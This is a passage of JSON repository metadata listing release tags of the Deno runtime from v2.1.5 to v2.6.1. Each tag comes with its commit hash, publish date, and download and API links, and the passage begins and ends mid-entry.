nifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":